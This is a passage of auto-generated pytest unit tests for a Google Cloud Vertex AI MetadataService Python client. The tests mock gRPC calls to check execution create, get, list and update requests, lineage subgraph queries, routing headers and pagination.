# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_context_lineage_subgraph), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = lineage_subgraph.LineageSubgraph()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.query_context_lineage_subgraph(
context="context_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].context
mock_val = "context_value"
assert arg == mock_val
def test_query_context_lineage_subgraph_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.query_context_lineage_subgraph(
metadata_service.QueryContextLineageSubgraphRequest(),
context="context_value",
)
@pytest.mark.asyncio
async def test_query_context_lineage_subgraph_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_context_lineage_subgraph), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = lineage_subgraph.LineageSubgraph()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
lineage_subgraph.LineageSubgraph()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.query_context_lineage_subgraph(
context="context_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].context
mock_val = "context_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_query_context_lineage_subgraph_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.query_context_lineage_subgraph(
metadata_service.QueryContextLineageSubgraphRequest(),
context="context_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.CreateExecutionRequest,
dict,
],
)
def test_create_execution(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_execution), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gca_execution.Execution(
name="name_value",
display_name="display_name_value",
state=gca_execution.Execution.State.NEW,
etag="etag_value",
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
response = client.create_execution(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.CreateExecutionRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gca_execution.Execution)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.state == gca_execution.Execution.State.NEW
assert response.etag == "etag_value"
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
def test_create_execution_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_execution), "__call__") as call:
client.create_execution()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.CreateExecutionRequest()
@pytest.mark.asyncio
async def test_create_execution_async(
transport: str = "grpc_asyncio",
request_type=metadata_service.CreateExecutionRequest,
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_execution), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gca_execution.Execution(
name="name_value",
display_name="display_name_value",
state=gca_execution.Execution.State.NEW,
etag="etag_value",
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
)
response = await client.create_execution(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.CreateExecutionRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gca_execution.Execution)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.state == gca_execution.Execution.State.NEW
assert response.etag == "etag_value"
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
@pytest.mark.asyncio
async def test_create_execution_async_from_dict():
await test_create_execution_async(request_type=dict)
def test_create_execution_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.CreateExecutionRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_execution), "__call__") as call:
call.return_value = gca_execution.Execution()
client.create_execution(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_create_execution_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.CreateExecutionRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_execution), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gca_execution.Execution()
)
await client.create_execution(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
def test_create_execution_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_execution), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gca_execution.Execution()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.create_execution(
parent="parent_value",
execution=gca_execution.Execution(name="name_value"),
execution_id="execution_id_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
arg = args[0].execution
mock_val = gca_execution.Execution(name="name_value")
assert arg == mock_val
arg = args[0].execution_id
mock_val = "execution_id_value"
assert arg == mock_val
def test_create_execution_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.create_execution(
metadata_service.CreateExecutionRequest(),
parent="parent_value",
execution=gca_execution.Execution(name="name_value"),
execution_id="execution_id_value",
)
@pytest.mark.asyncio
async def test_create_execution_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_execution), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gca_execution.Execution()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gca_execution.Execution()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.create_execution(
parent="parent_value",
execution=gca_execution.Execution(name="name_value"),
execution_id="execution_id_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
arg = args[0].execution
mock_val = gca_execution.Execution(name="name_value")
assert arg == mock_val
arg = args[0].execution_id
mock_val = "execution_id_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_create_execution_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.create_execution(
metadata_service.CreateExecutionRequest(),
parent="parent_value",
execution=gca_execution.Execution(name="name_value"),
execution_id="execution_id_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.GetExecutionRequest,
dict,
],
)
def test_get_execution(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_execution), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = execution.Execution(
name="name_value",
display_name="display_name_value",
state=execution.Execution.State.NEW,
etag="etag_value",
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
response = client.get_execution(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.GetExecutionRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, execution.Execution)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.state == execution.Execution.State.NEW
assert response.etag == "etag_value"
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
def test_get_execution_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_execution), "__call__") as call:
client.get_execution()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.GetExecutionRequest()
@pytest.mark.asyncio
async def test_get_execution_async(
transport: str = "grpc_asyncio", request_type=metadata_service.GetExecutionRequest
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_execution), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
execution.Execution(
name="name_value",
display_name="display_name_value",
state=execution.Execution.State.NEW,
etag="etag_value",
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
)
response = await client.get_execution(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.GetExecutionRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, execution.Execution)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.state == execution.Execution.State.NEW
assert response.etag == "etag_value"
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
@pytest.mark.asyncio
async def test_get_execution_async_from_dict():
await test_get_execution_async(request_type=dict)
def test_get_execution_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.GetExecutionRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_execution), "__call__") as call:
call.return_value = execution.Execution()
client.get_execution(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_get_execution_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.GetExecutionRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_execution), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(execution.Execution())
await client.get_execution(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
def test_get_execution_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_execution), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = execution.Execution()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_execution(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_get_execution_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_execution(
metadata_service.GetExecutionRequest(),
name="name_value",
)
@pytest.mark.asyncio
async def test_get_execution_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_execution), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = execution.Execution()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(execution.Execution())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.get_execution(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_get_execution_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.get_execution(
metadata_service.GetExecutionRequest(),
name="name_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.ListExecutionsRequest,
dict,
],
)
def test_list_executions(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_executions), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.ListExecutionsResponse(
next_page_token="next_page_token_value",
)
response = client.list_executions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.ListExecutionsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListExecutionsPager)
assert response.next_page_token == "next_page_token_value"
def test_list_executions_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_executions), "__call__") as call:
client.list_executions()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.ListExecutionsRequest()
@pytest.mark.asyncio
async def test_list_executions_async(
transport: str = "grpc_asyncio", request_type=metadata_service.ListExecutionsRequest
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_executions), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.ListExecutionsResponse(
next_page_token="next_page_token_value",
)
)
response = await client.list_executions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.ListExecutionsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListExecutionsAsyncPager)
assert response.next_page_token == "next_page_token_value"
@pytest.mark.asyncio
async def test_list_executions_async_from_dict():
await test_list_executions_async(request_type=dict)
def test_list_executions_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.ListExecutionsRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_executions), "__call__") as call:
call.return_value = metadata_service.ListExecutionsResponse()
client.list_executions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_list_executions_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.ListExecutionsRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_executions), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.ListExecutionsResponse()
)
await client.list_executions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
def test_list_executions_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_executions), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.ListExecutionsResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.list_executions(
parent="parent_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
def test_list_executions_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_executions(
metadata_service.ListExecutionsRequest(),
parent="parent_value",
)
@pytest.mark.asyncio
async def test_list_executions_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_executions), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.ListExecutionsResponse()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.ListExecutionsResponse()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.list_executions(
parent="parent_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_list_executions_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.list_executions(
metadata_service.ListExecutionsRequest(),
parent="parent_value",
)
def test_list_executions_pager(transport_name: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials,
transport=transport_name,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_executions), "__call__") as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListExecutionsResponse(
executions=[
execution.Execution(),
execution.Execution(),
execution.Execution(),
],
next_page_token="abc",
),
metadata_service.ListExecutionsResponse(
executions=[],
next_page_token="def",
),
metadata_service.ListExecutionsResponse(
executions=[
execution.Execution(),
],
next_page_token="ghi",
),
metadata_service.ListExecutionsResponse(
executions=[
execution.Execution(),
execution.Execution(),
],
),
RuntimeError,
)
metadata = ()
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)),
)
pager = client.list_executions(request={})
assert pager._metadata == metadata
results = list(pager)
assert len(results) == 6
assert all(isinstance(i, execution.Execution) for i in results)
def test_list_executions_pages(transport_name: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials,
transport=transport_name,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_executions), "__call__") as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListExecutionsResponse(
executions=[
execution.Execution(),
execution.Execution(),
execution.Execution(),
],
next_page_token="abc",
),
metadata_service.ListExecutionsResponse(
executions=[],
next_page_token="def",
),
metadata_service.ListExecutionsResponse(
executions=[
execution.Execution(),
],
next_page_token="ghi",
),
metadata_service.ListExecutionsResponse(
executions=[
execution.Execution(),
execution.Execution(),
],
),
RuntimeError,
)
pages = list(client.list_executions(request={}).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.asyncio
async def test_list_executions_async_pager():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_executions), "__call__", new_callable=mock.AsyncMock
) as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListExecutionsResponse(
executions=[
execution.Execution(),
execution.Execution(),
execution.Execution(),
],
next_page_token="abc",
),
metadata_service.ListExecutionsResponse(
executions=[],
next_page_token="def",
),
metadata_service.ListExecutionsResponse(
executions=[
execution.Execution(),
],
next_page_token="ghi",
),
metadata_service.ListExecutionsResponse(
executions=[
execution.Execution(),
execution.Execution(),
],
),
RuntimeError,
)
async_pager = await client.list_executions(
request={},
)
assert async_pager.next_page_token == "abc"
responses = []
async for response in async_pager: # pragma: no branch
responses.append(response)
assert len(responses) == 6
assert all(isinstance(i, execution.Execution) for i in responses)
@pytest.mark.asyncio
async def test_list_executions_async_pages():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_executions), "__call__", new_callable=mock.AsyncMock
) as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListExecutionsResponse(
executions=[
execution.Execution(),
execution.Execution(),
execution.Execution(),
],
next_page_token="abc",
),
metadata_service.ListExecutionsResponse(
executions=[],
next_page_token="def",
),
metadata_service.ListExecutionsResponse(
executions=[
execution.Execution(),
],
next_page_token="ghi",
),
metadata_service.ListExecutionsResponse(
executions=[
execution.Execution(),
execution.Execution(),
],
),
RuntimeError,
)
pages = []
async for page_ in (
await client.list_executions(request={})
).pages: # pragma: no branch
pages.append(page_)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.parametrize(
"request_type",
[
metadata_service.UpdateExecutionRequest,
dict,
],
)
def test_update_execution(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_execution), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gca_execution.Execution(
name="name_value",
display_name="display_name_value",
state=gca_execution.Execution.State.NEW,
etag="etag_value",
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
response = client.update_execution(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.UpdateExecutionRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gca_execution.Execution)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.state == gca_execution.Execution.State.NEW
assert response.etag == "etag_value"
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
def test_update_execution_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_execution), "__call__") as call:
client.update_execution()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.UpdateExecutionRequest()
@pytest.mark.asyncio
async def test_update_execution_async(
transport: str = "grpc_asyncio",
request_type=metadata_service.UpdateExecutionRequest,
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_execution), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gca_execution.Execution(
name="name_value",
display_name="display_name_value",
state=gca_execution.Execution.State.NEW,
etag="etag_value",
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
)
response = await client.update_execution(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.UpdateExecutionRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gca_execution.Execution)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.state == gca_execution.Execution.State.NEW
assert response.etag == "etag_value"
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
@pytest.mark.asyncio
async def test_update_execution_async_from_dict():
await test_update_execution_async(request_type=dict)
def test_update_execution_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.UpdateExecutionRequest()
request.execution.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_execution), "__call__") as call:
call.return_value = gca_execution.Execution()
client.update_execution(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"execution.name=name_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_update_execution_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.UpdateExecutionRequest()
request.execution.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_execution), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gca_execution.Execution()
)
await client.update_execution(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"execution.name=name_value",
) in kw["metadata"]
def test_update_execution_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_execution), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gca_execution.Execution()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.update_execution(
execution=gca_execution.Execution(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].execution
mock_val = gca_execution.Execution(name="name_value")
assert arg == mock_val
arg = args[0].update_mask
mock_val = field_mask_pb2.FieldMask(paths=["paths_value"])
assert arg == mock_val
def test_update_execution_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.update_execution(
metadata_service.UpdateExecutionRequest(),
execution=gca_execution.Execution(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
@pytest.mark.asyncio
async def test_update_execution_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_execution), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gca_execution.Execution()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gca_execution.Execution()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.update_execution(
execution=gca_execution.Execution(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
